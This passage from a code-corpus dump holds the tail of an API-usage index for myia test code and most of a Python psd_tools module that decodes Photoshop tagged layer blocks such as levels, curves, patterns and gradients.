"common.L", "line_number": 1929, "usage_type": "name"}, {"api_name": "common.f64", "line_number": 1929, "usage_type": "name"}, {"api_name": "common.lf64", "line_number": 1929, "usage_type": "name"}, {"api_name": "myia.infer.InferenceError", "line_number": 1929, "usage_type": "name"}, {"api_name": "common.T", "line_number": 1930, "usage_type": "name"}, {"api_name": "common.i64", "line_number": 1930, "usage_type": "name"}, {"api_name": "common.f64", "line_number": 1930, "usage_type": "name"}, {"api_name": "common.Point_t", "line_number": 1931, "usage_type": "name"}, {"api_name": "common.ai64", "line_number": 1932, "usage_type": "name"}, {"api_name": "common.i64", "line_number": 1933, "usage_type": "name"}, {"api_name": "common.f64", "line_number": 1933, "usage_type": "name"}, {"api_name": "myia.infer.InferenceError", "line_number": 1933, "usage_type": "name"}, {"api_name": "common.lf64", "line_number": 1934, "usage_type": "name"}, {"api_name": "common.f64", "line_number": 1934, "usage_type": "name"}, {"api_name": "myia.infer.InferenceError", "line_number": 1934, "usage_type": "name"}, {"api_name": "myia.infer.InferenceError", "line_number": 1935, "usage_type": "name"}, {"api_name": "common.Point", "line_number": 1940, "usage_type": "call"}, {"api_name": "common.i64", "line_number": 1945, "usage_type": "name"}, {"api_name": "myia.prim.py_implementations.scalar_add", "line_number": 1958, "usage_type": "argument"}, {"api_name": "common.T", "line_number": 1954, "usage_type": "name"}, {"api_name": "common.i64", "line_number": 1954, "usage_type": "name"}, {"api_name": "common.f64", "line_number": 1954, "usage_type": "name"}, {"api_name": "myia.infer.InferenceError", "line_number": 1954, "usage_type": "name"}, {"api_name": "myia.prim.py_implementations.scalar_add", "line_number": 1969, "usage_type": "argument"}, {"api_name": "myia.infer.InferenceError", "line_number": 1964, "usage_type": "name"}, {"api_name": "common.i64", "line_number": 1965, "usage_type": "name"}, {"api_name": "myia.infer.InferenceError", "line_number": 1965, "usage_type": "name"}, {"api_name": "myia.composite.hyper_add", "line_number": 1994, "usage_type": "call"}, {"api_name": "common.i64", "line_number": 1974, "usage_type": "name"}, {"api_name": "common.f64", "line_number": 1975, "usage_type": "name"}, {"api_name": "common.lf64", "line_number": 1976, "usage_type": "name"}, {"api_name": "common.T", "line_number": 1977, "usage_type": "name"}, {"api_name": "common.i64", "line_number": 1977, "usage_type": "name"}, {"api_name": "common.f64", "line_number": 1977, "usage_type": "name"}, {"api_name": "common.Point_t", "line_number": 1978, "usage_type": "name"}, {"api_name": "common.ai64", "line_number": 1979, "usage_type": "name"}, {"api_name": "myia.dtype.EnvType", "line_number": 1980, "usage_type": "name"}, {"api_name": "common.Point", "line_number": 1985, "usage_type": "call"}, {"api_name": "common.i64", "line_number": 1990, "usage_type": "name"}, {"api_name": "myia.composite.zeros_like", "line_number": 2018, "usage_type": "call"}, {"api_name": "common.i64", "line_number": 1999, "usage_type": "name"}, {"api_name": "common.f64", "line_number": 2000, "usage_type": "name"}, {"api_name": "common.lf64", "line_number": 2001, "usage_type": "name"}, {"api_name": "common.T", "line_number": 2002, "usage_type": "name"}, {"api_name": "common.i64", "line_number": 2002, "usage_type": "name"}, {"api_name": "common.f64", "line_number": 2002, "usage_type": "name"}, {"api_name": "common.Point_t", "line_number": 2003, "usage_type": "name"}, 
{"api_name": "common.ai64", "line_number": 2004, "usage_type": "name"}, {"api_name": "common.af32", "line_number": 2005, "usage_type": "name"}, {"api_name": "common.Point", "line_number": 2010, "usage_type": "call"}, {"api_name": "myia.composite.zeros_like", "line_number": 2025, "usage_type": "call"}, {"api_name": "common.i64", "line_number": 2021, "usage_type": "name"}, {"api_name": "myia.dtype.EnvType", "line_number": 2021, "usage_type": "name"}, {"api_name": "myia.composite.list_map", "line_number": 2039, "usage_type": "call"}, {"api_name": "common.li64", "line_number": 2030, "usage_type": "name"}, {"api_name": "common.lf64", "line_number": 2030, "usage_type": "name"}, {"api_name": "common.T", "line_number": 2030, "usage_type": "name"}, {"api_name": "common.li64", "line_number": 2031, "usage_type": "name"}, {"api_name": "common.f64", "line_number": 2031, "usage_type": "name"}, {"api_name": "myia.infer.InferenceError", "line_number": 2031, "usage_type": "name"}, {"api_name": "myia.composite.list_map", "line_number": 2053, "usage_type": "call"}, {"api_name": "common.li64", "line_number": 2044, "usage_type": "name"}, {"api_name": "common.li64", "line_number": 2045, "usage_type": "name"}, {"api_name": "common.lf64", "line_number": 2045, "usage_type": "name"}, {"api_name": "myia.infer.InferenceError", "line_number": 2045, "usage_type": "name"}, {"api_name": "myia.composite.list_map", "line_number": 2062, "usage_type": "call"}, {"api_name": "myia.infer.InferenceError", "line_number": 2056, "usage_type": "name"}, {"api_name": "myia.utils.newenv", "line_number": 2073, "usage_type": "name"}, {"api_name": "myia.prim.py_implementations.env_setitem", "line_number": 2074, "usage_type": "call"}, {"api_name": "myia.prim.py_implementations.embed", "line_number": 2074, "usage_type": "call"}, {"api_name": "myia.prim.py_implementations.env_getitem", "line_number": 2075, "usage_type": "call"}, {"api_name": "myia.prim.py_implementations.embed", "line_number": 2075, "usage_type": "call"}, {"api_name": "common.i32", "line_number": 2067, "usage_type": "name"}, {"api_name": "common.i32", "line_number": 2068, "usage_type": "name"}, {"api_name": "common.f32", "line_number": 2068, "usage_type": "name"}, {"api_name": "myia.infer.InferenceError", "line_number": 2068, "usage_type": "name"}, {"api_name": "common.i32", "line_number": 2069, "usage_type": "name"}, {"api_name": "common.f32", "line_number": 2069, "usage_type": "name"}, {"api_name": "myia.infer.InferenceError", "line_number": 2069, "usage_type": "name"}, {"api_name": "myia.prim.py_implementations.J", "line_number": 2088, "usage_type": "call"}, {"api_name": "myia.prim.py_implementations.J", "line_number": 2089, "usage_type": "call"}, {"api_name": "common.i32", "line_number": 2080, "usage_type": "name"}, {"api_name": "common.T", "line_number": 2080, "usage_type": "name"}, {"api_name": "myia.dtype.JTagged", "line_number": 2080, "usage_type": "name"}, {"api_name": "myia.dtype.EnvType", "line_number": 2080, "usage_type": "name"}, {"api_name": "common.f64", "line_number": 2081, "usage_type": "name"}, {"api_name": "common.T", "line_number": 2081, "usage_type": "name"}, {"api_name": "myia.dtype.JTagged", "line_number": 2081, "usage_type": "name"}, {"api_name": "myia.dtype.EnvType", "line_number": 2081, "usage_type": "name"}, {"api_name": "myia.prim.py_implementations.Jinv", "line_number": 2103, "usage_type": "call"}, {"api_name": "myia.dtype.JTagged", "line_number": 2097, "usage_type": "name"}, {"api_name": "common.i32", "line_number": 2097, "usage_type": "name"}, 
{"api_name": "myia.dtype.JTagged", "line_number": 2098, "usage_type": "name"}, {"api_name": "common.L", "line_number": 2098, "usage_type": "name"}, {"api_name": "common.i32", "line_number": 2098, "usage_type": "name"}, {"api_name": "common.i32", "line_number": 2099, "usage_type": "name"}, {"api_name": "myia.infer.InferenceError", "line_number": 2099, "usage_type": "name"}, {"api_name": "myia.prim.py_implementations.Jinv", "line_number": 2120, "usage_type": "call"}, {"api_name": "myia.prim.py_implementations.J", "line_number": 2120, "usage_type": "call"}, {"api_name": "common.i32", "line_number": 2108, "usage_type": "name"}, {"api_name": "common.f64", "line_number": 2109, "usage_type": "name"}, {"api_name": "common.ai64", "line_number": 2110, "usage_type": "name"}, {"api_name": "myia.prim.py_implementations.Jinv", "line_number": 2128, "usage_type": "call"}, {"api_name": "common.i32", "line_number": 2124, "usage_type": "name"}, {"api_name": "myia.infer.InferenceError", "line_number": 2124, "usage_type": "name"}, {"api_name": "myia.prim.py_implementations.array_reduce", "line_number": 2142, "usage_type": "call"}, {"api_name": "myia.prim.py_implementations.array_to_scalar", "line_number": 2143, "usage_type": "call"}, {"api_name": "myia.prim.py_implementations.J", "line_number": 2144, "usage_type": "call"}, {"api_name": "myia.prim.py_implementations.Jinv", "line_number": 2145, "usage_type": "call"}, {"api_name": "common.T", "line_number": 2133, "usage_type": "name"}, {"api_name": "common.f32", "line_number": 2133, "usage_type": "name"}, {"api_name": "myia.dtype.EnvType", "line_number": 2133, "usage_type": "name"}, {"api_name": "common.af32", "line_number": 2133, "usage_type": "name"}, {"api_name": "myia.dshape.TupleShape", "line_number": 2137, "usage_type": "call"}, {"api_name": "myia.dshape.NOSHAPE", "line_number": 2137, "usage_type": "name"}, {"api_name": "myia.composite.grad", "line_number": 2157, "usage_type": "call"}, {"api_name": "common.f32", "line_number": 2150, "usage_type": "name"}, {"api_name": "common.i16", "line_number": 2151, "usage_type": "name"}, {"api_name": "myia.prim.py_implementations.scalar_cast", "line_number": 2169, "usage_type": "call"}, {"api_name": "common.f16", "line_number": 2169, "usage_type": "argument"}, {"api_name": "myia.composite.grad", "line_number": 2171, "usage_type": "call"}, {"api_name": "common.i64", "line_number": 2162, "usage_type": "name"}, {"api_name": "common.f32", "line_number": 2163, "usage_type": "name"}, {"api_name": "common.f64", "line_number": 2164, "usage_type": "name"}, {"api_name": "myia.prim.py_implementations.array_reduce", "line_number": 2184, "usage_type": "call"}, {"api_name": "myia.prim.py_implementations.scalar_add", "line_number": 2184, "usage_type": "argument"}, {"api_name": "myia.composite.grad", "line_number": 2186, "usage_type": "call"}, {"api_name": "common.af16", "line_number": 2176, "usage_type": "name"}]} +{"seq_id": "233788879", "text": "# -*- coding: utf-8 -*-\nfrom __future__ import absolute_import, unicode_literals, print_function\nimport warnings\nimport collections\nimport io\n\nfrom psd_tools.constants import TaggedBlock, SectionDivider, ColorMode\nfrom psd_tools.decoder.actions import (decode_descriptor, UnknownOSType,\n RawData)\nfrom psd_tools.utils import (read_fmt, unpack, read_unicode_string,\n read_pascal_string)\nfrom psd_tools.decoder import decoders, layer_effects\nfrom psd_tools.decoder.color import decode_color\nfrom psd_tools.decoder.path import decode_path_resource\nfrom psd_tools.reader.layers import 
Block\nfrom psd_tools.debug import pretty_namedtuple\nfrom psd_tools.decoder import engine_data\n\n_tagged_block_decoders, register = decoders.new_registry()\n\n_tagged_block_decoders.update({\n TaggedBlock.BLEND_CLIPPING_ELEMENTS: decoders.boolean(\"I\"),\n TaggedBlock.BLEND_INTERIOR_ELEMENTS: decoders.boolean(\"I\"),\n TaggedBlock.BLEND_FILL_OPACITY: decoders.single_value(\"4B\"),\n TaggedBlock.KNOCKOUT_SETTING: decoders.boolean(\"I\"),\n TaggedBlock.UNICODE_LAYER_NAME: decoders.unicode_string,\n TaggedBlock.LAYER_ID: decoders.single_value(\"I\"), # XXX: there are more fields in docs, but they seem to be incorrect\n TaggedBlock.EFFECTS_LAYER: layer_effects.decode,\n TaggedBlock.OBJECT_BASED_EFFECTS_LAYER_INFO: layer_effects.decode_object_based,\n TaggedBlock.OBJECT_BASED_EFFECTS_LAYER_INFO_V0: layer_effects.decode_object_based,\n TaggedBlock.OBJECT_BASED_EFFECTS_LAYER_INFO_V1: layer_effects.decode_object_based,\n TaggedBlock.USING_ALIGNED_RENDERING: decoders.boolean(\"I\"),\n TaggedBlock.LAYER_VERSION: decoders.single_value(\"I\"),\n TaggedBlock.TRANSPARENCY_SHAPES_LAYER: decoders.single_value(\"4B\"),\n TaggedBlock.LAYER_MASK_AS_GLOBAL_MASK: decoders.single_value(\"4B\"),\n TaggedBlock.VECTOR_MASK_AS_GLOBAL_MASK: decoders.single_value(\"4B\"),\n})\n\n\nSolidColorSetting = pretty_namedtuple('SolidColorSetting', 'version data')\nPatternFillSetting = pretty_namedtuple('PatternFillSetting', 'version data')\nGradientFillSetting = pretty_namedtuple('GradientFillSetting', 'version data')\nBrightnessContrast = pretty_namedtuple('BrightnessContrast',\n 'brightness contrast mean lab')\nLevelsSettings = pretty_namedtuple('LevelsSettings', 'version data')\nLevelRecord = pretty_namedtuple('LevelRecord', 'input_floor input_ceiling '\n 'output_floor output_ceiling gamma')\nCurvesSettings = pretty_namedtuple(\n 'CurvesSettings', 'version count data extra')\nCurvesExtraMarker = pretty_namedtuple(\n 'CurvesExtraMarker', 'tag version count data')\nCurveData = pretty_namedtuple('CurveData', 'channel points')\nExposure = pretty_namedtuple('Exposure', 'version exposure offset gamma')\nVibrance = pretty_namedtuple('Vibrance', 'descriptor_version descriptor')\nHueSaturation = pretty_namedtuple(\n 'HueSaturation', 'version enable_colorization colorization master items')\nHueSaturationData = pretty_namedtuple('HueSaturationData', 'range settings')\nColorBalance = pretty_namedtuple(\n 'ColorBalance', 'shadows midtones highlights preserve_luminosity')\nBlackWhite = pretty_namedtuple('BlackWhite', 'descriptor_version descriptor')\nPhotoFilter = pretty_namedtuple(\n 'PhotoFilter',\n 'version xyz color_space color_components density preserve_luminosity')\nChannelMixer = pretty_namedtuple(\n 'ChannelMixer', 'version monochrome mixer_settings')\nColorLookup = pretty_namedtuple(\n 'ColorLookup', 'version, descriptor_version descriptor')\nInvert = pretty_namedtuple('Invert', '')\nPosterize = pretty_namedtuple('Posterize', 'value')\nThreshold = pretty_namedtuple('Threshold', 'value')\nSelectiveColor = pretty_namedtuple('SelectiveColor', 'version, method items')\nPattern = pretty_namedtuple('Pattern', 'version image_mode point name '\n 'pattern_id color_table data')\nVirtualMemoryArrayList = pretty_namedtuple(\n 'VirtualMemoryArrayList', 'version rectangle channels')\nVirtualMemoryArray = pretty_namedtuple(\n 'VirtualMemoryArray', 'is_written depth rectangle pixel_depth '\n 'compression data')\nGradientSettings = pretty_namedtuple(\n 'GradientSettings',\n 'version reversed dithered name color_stops transparency_stops 
expansion '\n 'interpolation length mode random_seed show_transparency '\n 'use_vector_color roughness color_model min_color max_color')\nColorStop = pretty_namedtuple('ColorStop', 'location midpoint mode color')\nTransparencyStop = pretty_namedtuple(\n 'TransparencyStop',\n 'location midpoint opacity expansion interpolation length mode')\nExportData = pretty_namedtuple('ExportData', 'version data')\nVectorStrokeSetting = pretty_namedtuple('VectorStrokeSetting', 'version data')\nVectorStrokeContentSetting = pretty_namedtuple(\n 'VectorStrokeContentSetting', 'key version data')\nMetadataItem = pretty_namedtuple('MetadataItem', 'key copy_on_sheet_duplication descriptor_version data')\nProtectedSetting = pretty_namedtuple('ProtectedSetting', 'transparency, composite, position')\nTypeToolObjectSetting = pretty_namedtuple('TypeToolObjectSetting',\n 'version xx xy yx yy tx ty text_version descriptor1_version text_data '\n 'warp_version descriptor2_version warp_data left top right bottom')\nContentGeneratorExtraData = pretty_namedtuple(\n 'ContentGeneratorExtraData', 'descriptor_version descriptor')\nUnicodePathName = pretty_namedtuple(\n 'UnicodePathName', 'descriptor_version descriptor')\nAnimationEffects = pretty_namedtuple(\n 'AnimationEffects', 'descriptor_version descriptor')\nFilterMask = pretty_namedtuple('FilterMask', 'color opacity')\nVectorOriginationData = pretty_namedtuple('VectorOriginationData', 'version descriptor_version data')\nVectorMaskSetting = pretty_namedtuple(\n 'VectorMaskSetting','version invert not_link disable path')\nPixelSourceData = pretty_namedtuple('PixelSourceData', 'version data')\nArtboardData = pretty_namedtuple('ArtboardData', 'version data')\nUserMask = pretty_namedtuple('UserMask', 'color opacity flag')\nFilterEffects = pretty_namedtuple(\n 'FilterEffects',\n 'uuid version rectangle depth max_channels channels extra_data')\nFilterEffectChannel = pretty_namedtuple(\n 'FilterEffectChannel', 'is_written compression data')\nPlacedLayerObsolete = pretty_namedtuple(\n 'PlacedLayerObsolete',\n 'type version uuid page total_pages anti_alias layer_type transformation '\n 'warp')\nWarpInformation = pretty_namedtuple(\n 'WarpInformation', 'version descriptor_version descriptor')\n\n\nclass Divider(collections.namedtuple('Divider', 'block type key')):\n def __repr__(self):\n return \"Divider(%s %r %s, %s)\" % (\n self.block, self.type, SectionDivider.name_of(self.type), self.key)\n\n\ndef decode(tagged_blocks, version):\n \"\"\"\n Replaces \"data\" attribute of a blocks from ``tagged_blocks`` list\n with parsed data structure if it is known how to parse it.\n \"\"\"\n return [parse_tagged_block(block, version) for block in tagged_blocks]\n\n\ndef parse_tagged_block(block, version=1, **kwargs):\n \"\"\"\n Replaces \"data\" attribute of a block with parsed data structure\n if it is known how to parse it.\n \"\"\"\n if not TaggedBlock.is_known(block.key):\n warnings.warn(\"Unknown tagged block (%s)\" % block.key)\n\n decoder = _tagged_block_decoders.get(block.key, lambda data, **kwargs: data)\n return Block(block.key, decoder(block.data, version=version))\n\n\ndef _decode_descriptor_block(data, kls):\n if isinstance(data, bytes):\n fp = io.BytesIO(data)\n version = read_fmt(\"I\", fp)[0]\n\n try:\n return kls(version, decode_descriptor(None, fp))\n except UnknownOSType as e:\n warnings.warn(\"Ignoring tagged block %s\" % e)\n return data\n\n\n@register(TaggedBlock.SOLID_COLOR_SHEET_SETTING)\ndef _decode_soco(data, **kwargs):\n return _decode_descriptor_block(data, 
SolidColorSetting)\n\n\n@register(TaggedBlock.PATTERN_FILL_SETTING)\ndef _decode_ptfl(data, **kwargs):\n return _decode_descriptor_block(data, PatternFillSetting)\n\n\n@register(TaggedBlock.GRADIENT_FILL_SETTING)\ndef _decode_grfl(data, **kwargs):\n return _decode_descriptor_block(data, GradientFillSetting)\n\n\n@register(TaggedBlock.BRIGHTNESS_AND_CONTRAST)\ndef _decode_brightness_and_contrast(data, **kwargs):\n return BrightnessContrast(*read_fmt(\"3H B\", io.BytesIO(data)))\n\n\n@register(TaggedBlock.LEVELS)\ndef _decode_levels(data, **kwargs):\n def read_level_record(fp):\n input_f, input_c, output_f, output_c, gamma = read_fmt(\"5H\", fp)\n return LevelRecord(\n input_f, input_c, output_f, output_c, gamma / 100.0)\n\n fp = io.BytesIO(data)\n version = read_fmt(\"H\", fp)[0]\n level_records = [read_level_record(fp) for i in range(29)]\n\n # decode extra level record, Photoshop CS (8.0) Additional information\n if fp.tell() < len(data):\n signature = read_fmt('4s', fp)[0]\n assert signature == b'Lvls', 'unexpected token: {0}'.format(signature)\n _ = read_fmt('H', fp)[0] # version (= 3)\n count = read_fmt('H', fp)[0] - 29\n level_records = level_records + [read_level_record(fp) for i in range(count)]\n\n return LevelsSettings(version, level_records)\n\n\n@register(TaggedBlock.CURVES)\ndef _decode_curves(data, **kwargs):\n fp = io.BytesIO(data)\n padding, version, count = read_fmt(\"B H I\", fp) # Documentation wrong.\n if version not in (1, 4):\n warnings.warn(\"Invalid curves version {}\".format(version))\n return data\n if version == 1:\n count = bin(count).count(\"1\") # Bitmap = channel index?\n\n items = []\n for i in range(count):\n point_count = read_fmt(\"H\", fp)[0]\n points = [read_fmt(\"2H\", fp) for c in range(point_count)]\n items.append(CurveData(None, points))\n extra = None\n if version == 1:\n tag, version_, count_ = read_fmt(\"4s H I\", fp)\n extra_items = []\n for i in range(count_):\n channel_index, point_count = read_fmt(\"2H\", fp)\n points = [read_fmt(\"2H\", fp) for c in range(point_count)]\n extra_items.append(CurveData(channel_index, points))\n extra = CurvesExtraMarker(tag, version_, count_, extra_items)\n return CurvesSettings(version, count, items, extra)\n\n\n@register(TaggedBlock.EXPOSURE)\ndef _decode_exposure(data, **kwargs):\n return Exposure(*read_fmt(\"H 3f\", io.BytesIO(data)))\n\n\n@register(TaggedBlock.VIBRANCE)\ndef _decode_vibrance(data, **kwargs):\n return _decode_descriptor_block(data, Vibrance)\n\n\n@register(TaggedBlock.HUE_SATURATION_V4)\n@register(TaggedBlock.HUE_SATURATION)\ndef _decode_hue_saturation(data, **kwargs):\n fp = io.BytesIO(data)\n version, enable_colorization, _ = read_fmt('H 2B', fp)\n if version != 2:\n warnings.warn(\"Invalid Hue/saturation version {}\".format(version))\n return data\n colorization = read_fmt(\"3h\", fp)\n master = read_fmt(\"3h\", fp)\n items = []\n for i in range(6):\n range_values = read_fmt(\"4h\", fp)\n settings_values = read_fmt(\"3h\", fp)\n items.append(HueSaturationData(range_values, settings_values))\n return HueSaturation(version, enable_colorization, colorization, master,\n items)\n\n\n@register(TaggedBlock.COLOR_BALANCE)\ndef _decode_color_balance(data, **kwargs):\n # Undocumented, following PhotoFilter format.\n fp = io.BytesIO(data)\n shadows = read_fmt(\"3h\", fp)\n midtones = read_fmt(\"3h\", fp)\n highlights = read_fmt(\"3h\", fp)\n preserve_luminosity = read_fmt(\"B\", fp)[0]\n return ColorBalance(shadows, midtones, highlights, 
preserve_luminosity)\n\n\n@register(TaggedBlock.BLACK_AND_WHITE)\ndef _decode_black_white(data, **kwargs):\n return _decode_descriptor_block(data, BlackWhite)\n\n\n@register(TaggedBlock.PHOTO_FILTER)\ndef _decode_photo_filter(data, **kwargs):\n fp = io.BytesIO(data)\n version = read_fmt(\"H\", fp)[0]\n if version not in (2, 3):\n warnings.warn(\"Invalid Photo Filter version {}\".format(version))\n return data\n if version == 3:\n xyz = read_fmt(\"3I\", fp)\n color_space = None\n color_components = None\n else:\n xyz = None\n color_space = read_fmt(\"H\", fp)[0]\n color_components = read_fmt(\"4H\", fp)\n density, preserve_luminosity = read_fmt(\"I B\", fp)\n return PhotoFilter(version, xyz, color_space, color_components,\n density, preserve_luminosity)\n\n\n@register(TaggedBlock.CHANNEL_MIXER)\ndef _decode_channel_mixer(data, **kwargs):\n fp = io.BytesIO(data)\n version, monochrome = read_fmt(\"2H\", fp)\n settings = read_fmt(\"5H\", fp)\n return ChannelMixer(version, monochrome, settings)\n\n\n@register(TaggedBlock.COLOR_LOOKUP)\ndef _decode_color_lookup(data, **kwargs):\n fp = io.BytesIO(data)\n version, descriptor_version = read_fmt(\"H I\", fp)\n\n try:\n return ColorLookup(version, descriptor_version,\n decode_descriptor(None, fp))\n except UnknownOSType as e:\n warnings.warn(\"Ignoring tagged block %s\" % e)\n return data\n\n\n@register(TaggedBlock.INVERT)\ndef _decode_invert(data, **kwargs):\n return Invert()\n\n\n@register(TaggedBlock.POSTERIZE)\ndef _decode_posterize(data, **kwargs):\n return Posterize(read_fmt(\"2H\", io.BytesIO(data))[0])\n\n\n@register(TaggedBlock.THRESHOLD)\ndef _decode_threshold(data, **kwargs):\n return Threshold(read_fmt(\"2H\", io.BytesIO(data))[0])\n\n\n@register(TaggedBlock.SELECTIVE_COLOR)\ndef _decode_selective_color(data, **kwargs):\n fp = io.BytesIO(data)\n version, method = read_fmt(\"2H\", fp)\n if version != 1:\n warnings.warn(\"Invalid Selective Color version %s\" % (version))\n return data\n items = [read_fmt(\"4h\", fp) for i in range(10)]\n return SelectiveColor(version, method, items)\n\n\n@register(TaggedBlock.PATTERNS1)\n@register(TaggedBlock.PATTERNS2)\n@register(TaggedBlock.PATTERNS3)\ndef _decode_patterns(data, **kwargs):\n fp = io.BytesIO(data)\n patterns = []\n while fp.tell() < len(data) - 4:\n length = read_fmt(\"I\", fp)[0]\n if length == 0:\n break\n patterns.append(_decode_pattern(fp.read(length)))\n extra_bytes = fp.tell() % 4\n if extra_bytes:\n fp.read(4 - extra_bytes) # 4-bytes padding.\n return patterns\n\n\ndef _decode_pattern(data):\n fp = io.BytesIO(data)\n version, image_mode = read_fmt(\"2I\", fp)\n if version != 1:\n warnings.warn(\"Unsupported patterns version %s\" % (version))\n return data\n\n point = read_fmt(\"2h\", fp)\n name = read_unicode_string(fp)\n pattern_id = read_pascal_string(fp, 'ascii')\n color_table = None\n if image_mode == ColorMode.INDEXED:\n color_table = [read_fmt(\"3B\", fp) for i in range(256)]\n read_fmt('4B', fp) # Undocumented field here...\n vma_list = _decode_virtual_memory_array_list(fp)\n return Pattern(version, image_mode, point, name, pattern_id, color_table,\n vma_list)\n\n\ndef _decode_virtual_memory_array_list(fp):\n version, length = read_fmt(\"2I\", fp)\n if version != 3:\n warnings.warn(\"Unsupported virtual memory array list %s\" % (version))\n return None\n start = fp.tell()\n rectangle = read_fmt(\"4I\", fp)\n num_channels = read_fmt(\"I\", fp)[0]\n channels = []\n for i in range(num_channels + 2):\n is_written = read_fmt(\"I\", fp)[0]\n if is_written == 0:\n continue\n 
array_length = read_fmt(\"I\", fp)[0]\n if array_length == 0:\n continue\n depth = read_fmt(\"I\", fp)[0]\n array_rect = read_fmt(\"4I\", fp)\n pixel_depth, compression = read_fmt(\"H B\", fp)\n channel_data = RawData(fp.read(array_length - 23))\n channels.append(VirtualMemoryArray(is_written, depth, array_rect,\n pixel_depth, compression, channel_data))\n return VirtualMemoryArrayList(version, rectangle, channels)\n\n\n@register(TaggedBlock.GRADIENT_MAP_SETTING)\ndef _decode_gradient_settings(data, **kwargs):\n fp = io.BytesIO(data)\n version, is_reversed, is_dithered = read_fmt(\"H 2B\", fp)\n if version != 1:\n warnings.warn(\"Invalid Gradient settings version %s\" % (version))\n return data\n name = read_unicode_string(fp)\n color_count = read_fmt(\"H\", fp)[0]\n color_stops = []\n for i in range(color_count):\n location, midpoint, mode = read_fmt(\"2i H\", fp)\n color = read_fmt(\"4H\", fp)\n color_stops.append(ColorStop(location, midpoint, mode, color))\n read_fmt(\"H\", fp) # Undocumented pad.\n transparency_count = read_fmt(\"H\", fp)[0]\n transparency_stops = []\n for i in range(transparency_count):\n transparency_stops.append(read_fmt(\"2I H\", fp))\n\n expansion, interpolation, length, mode = read_fmt(\"4H\", fp)\n if expansion != 2 or length != 32:\n warnings.warn(\"Ignoring Gradient settings\")\n return data\n random_seed, show_transparency, use_vector_color = read_fmt(\"I 2H\", fp)\n roughness, color_model = read_fmt(\"I H\", fp)\n minimum_color = read_fmt(\"4H\", fp)\n maximum_color = read_fmt(\"4H\", fp)\n read_fmt(\"H\", fp) # Dummy pad.\n\n return GradientSettings(\n version, is_reversed, is_dithered, name, color_stops,\n transparency_stops, expansion, interpolation, length, mode,\n random_seed, show_transparency, use_vector_color, roughness,\n color_model, minimum_color, maximum_color)\n\n\n@register(TaggedBlock.EXPORT_DATA)\ndef _decode_extd(data, **kwargs):\n fp = io.BytesIO(data)\n version = read_fmt(\"I\", fp)[0]\n try:\n data = decode_descriptor(None, fp)\n return ExportData(version, data)\n except UnknownOSType as e:\n warnings.warn(\"Ignoring extd tagged block (%s)\" % e)\n return data\n\n\n@register(TaggedBlock.REFERENCE_POINT)\ndef _decode_reference_point(data, **kwargs):\n return read_fmt(\"2d\", io.BytesIO(data))\n\n\n@register(TaggedBlock.SHEET_COLOR_SETTING)\ndef _decode_color_setting(data, **kwargs):\n return read_fmt(\"4H\", io.BytesIO(data))\n\n\n@register(TaggedBlock.SECTION_DIVIDER_SETTING)\ndef _decode_section_divider(data, **kwargs):\n tp, key = _decode_divider(data)\n return Divider(TaggedBlock.SECTION_DIVIDER_SETTING, tp, key)\n\n\n@register(TaggedBlock.NESTED_SECTION_DIVIDER_SETTING)\ndef _decode_section_divider(data, **kwargs):\n tp, key = _decode_divider(data)\n return Divider(TaggedBlock.NESTED_SECTION_DIVIDER_SETTING, tp, key)\n\n\ndef _decode_divider(data):\n fp = io.BytesIO(data)\n key = None\n tp = read_fmt(\"I\", fp)[0]\n if not SectionDivider.is_known(tp):\n warnings.warn(\"Unknown section divider type (%s)\" % tp)\n\n if len(data) == 12:\n sig = fp.read(4)\n if sig != b'8BIM':\n warnings.warn(\"Invalid signature in section divider block\")\n key = fp.read(4)\n\n return tp, key\n\n\n@register(TaggedBlock.PLACED_LAYER_DATA)\n@register(TaggedBlock.SMART_OBJECT_PLACED_LAYER_DATA)\ndef _decode_placed_layer(data, **kwargs):\n fp = io.BytesIO(data)\n type, version, descriptorVersion = read_fmt(\"4s I I\", fp)\n descriptor = decode_descriptor(None, fp)\n return descriptor.items\n\n\n@register(TaggedBlock.VECTOR_STROKE_DATA)\ndef 
_decode_vector_stroke_data(data, **kwargs):\n fp = io.BytesIO(data)\n version = read_fmt(\"I\", fp)[0]\n\n if version != 16:\n warnings.warn(\"Invalid vstk version %s\" % (version))\n return data\n\n try:\n data = decode_descriptor(None, fp)\n return VectorStrokeSetting(version, data)\n except UnknownOSType as e:\n warnings.warn(\"Ignoring vstk tagged block (%s)\" % e)\n return data\n\n\n@register(TaggedBlock.VECTOR_STROKE_CONTENT_DATA)\ndef _decode_vector_stroke_content_data(data, **kwargs):\n fp = io.BytesIO(data)\n key, version = read_fmt(\"II\", fp)\n\n if version != 16:\n warnings.warn(\"Invalid vscg version %s\" % (version))\n return data\n\n try:\n descriptor = decode_descriptor(None, fp)\n except UnknownOSType as e:\n warnings.warn(\"Ignoring vscg tagged block (%s)\" % e)\n return data\n\n return VectorStrokeContentSetting(key, version, descriptor)\n\n\n@register(TaggedBlock.METADATA_SETTING)\ndef _decode_metadata(data, **kwargs):\n fp = io.BytesIO(data)\n items_count = read_fmt(\"I\", fp)[0]\n items = []\n\n for x in range(items_count):\n sig = fp.read(4)\n if sig != b'8BIM':\n warnings.warn(\"Invalid signature in metadata item (%s)\" % sig)\n\n key, copy_on_sheet, data_length = read_fmt(\"4s ? 3x I\", fp)\n\n data = fp.read(data_length)\n if data_length < 4+12:\n # descr_version is 4 bytes, descriptor is at least 12 bytes,\n # so data can't be a descriptor.\n descr_ver = None\n else:\n # try load data as a descriptor\n fp2 = io.BytesIO(data)\n descr_ver = read_fmt(\"I\", fp2)[0]\n try:\n data = decode_descriptor(None, fp2)\n except UnknownOSType as e:\n # FIXME: can it fail with other exceptions?\n descr_ver = None\n warnings.warn(\"Can't decode metadata item (%s)\" % e)\n\n items.append(MetadataItem(key, copy_on_sheet, descr_ver, data))\n\n return items\n\n\n@register(TaggedBlock.PROTECTED_SETTING)\ndef _decode_protected(data, **kwargs):\n flag = unpack(\"I\", data)[0]\n return ProtectedSetting(\n bool(flag & 1),\n bool(flag & 2),\n bool(flag & 4),\n )\n\n\n@register(TaggedBlock.LAYER_32)\ndef _decode_layer32(data, version=1, **kwargs):\n from psd_tools.reader import layers\n from psd_tools.decoder.decoder import decode_layers\n fp = io.BytesIO(data)\n layers = layers._read_layers(fp, 'latin1', 32, length=len(data), version=version)\n return decode_layers(layers, version)\n\n\n@register(TaggedBlock.LAYER_16)\ndef _decode_layer16(data, version=1, **kwargs):\n from psd_tools.reader import layers\n from psd_tools.decoder.decoder import decode_layers\n fp = io.BytesIO(data)\n layers = layers._read_layers(fp, 'latin1', 16, length=len(data), version=version)\n return decode_layers(layers, 